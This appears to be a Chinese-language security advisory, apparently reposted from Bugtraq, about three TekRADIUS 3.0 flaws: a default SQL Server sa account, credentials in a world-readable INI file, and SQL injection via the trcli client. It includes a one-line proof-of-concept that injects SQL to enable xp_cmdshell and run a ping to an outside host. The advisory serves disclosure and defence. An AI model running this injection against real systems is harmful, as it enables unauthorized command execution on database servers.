TekRADIUS SQL注入及不安全权限漏洞

受影响系统:

Yasin KAPLAN TekRADIUS 3.0

描述:


CVE(CAN) ID: CVE-2009-2357,CVE-2009-2358,CVE-2009-2359

TekRadius是一个免费的RADIUS服务器,可以支持RFC 2865和RFC 2866规范。

1) TekRADIUS的默认配置使用sa账号与Microsoft SQL Server通讯,远程攻击者可以相对较容易的获得对数据库的特权访问。

2) TekRADIUS将数据库凭据存储在了C:\Program Files\TekRADIUS\TekRADIUS.ini文件中。任何Windows本地用户都可以访问这个文件,读取加密了的凭据。

3) 可通过GUI或命令行客户端管理TekRADIUS。根据设计,非特权Windows用户仅有有限的功能以防范某些更改。但如果用户在对话框或命令行中提及了恶意参数请求,就可以通过SQL注入攻击对数据库执行非授权操作。

<*来源:Tim Brown (securityfocus@machine.org.uk
  
  链接:http://marc.info/?l=bugtraq&m=124689568112833&w=2
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

C:\Program Files\TekRADIUS>trcli  -r "’; exec master.dbo.sp_configure ‘show advanced options’, 1; reconfigure; exec master.dbo.sp_configure ‘xp_cmdshell’, 1; reconfigure; exec master.dbo.xp_cmdshell ‘ping www.nth-dimension.org.uk’–"

建议:


厂商补丁:

Yasin KAPLAN
————
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.tekradius.com/

发表评论?

0 条评论。

发表评论